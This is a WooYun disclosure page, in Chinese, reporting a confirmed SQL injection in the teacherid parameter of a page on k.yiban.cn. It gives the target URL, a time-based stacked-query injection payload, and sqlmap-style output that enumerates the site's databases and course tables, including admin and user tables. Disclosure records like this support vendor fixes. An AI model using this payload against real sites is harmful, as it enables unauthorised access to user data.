当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111920

漏洞标题:易班网某站SQL注射漏洞

相关厂商:yiban.cn

漏洞作者: 路人甲

提交时间:2015-05-04 16:16

修复时间:2015-06-19 16:38

公开时间:2015-06-19 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

233

详细说明:

http://k.yiban.cn/index.php?a=teacherDetail&c=teacherlist&teacherid=
payload:
teacherid = ');(SELECT * FROM (SELECT(SLEEP(5)))INOr)#

漏洞证明:

---
Parameter: teacherid (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: a=teacherDetail&c=teacherlist&teacherid=');(SELECT * FROM (SELECT(SLEEP(5)))INOr)#
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
current user is DBA: False
available databases [4]:
[*] information_sciema
[*] test
[*] video
[*] yb_course
Database: yb_course
[16 tables]
+----------------------------+
| course_admin_user |
| course_answer |
| course_answer_attachment |
| course_app |
| course_class |
| course_guestbook |
| course_message |
| course_message_attachment |
| course_question |
| course_question_attachment |
| course_user |
| course_user_level |
| course_user_permission |
| course_user_sms |
| course_user_types |
| invkte_code |
+----------------------------+

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-05 16:36

厂商回复:

感谢路人甲

最新状态:

暂无


漏洞评价:

评论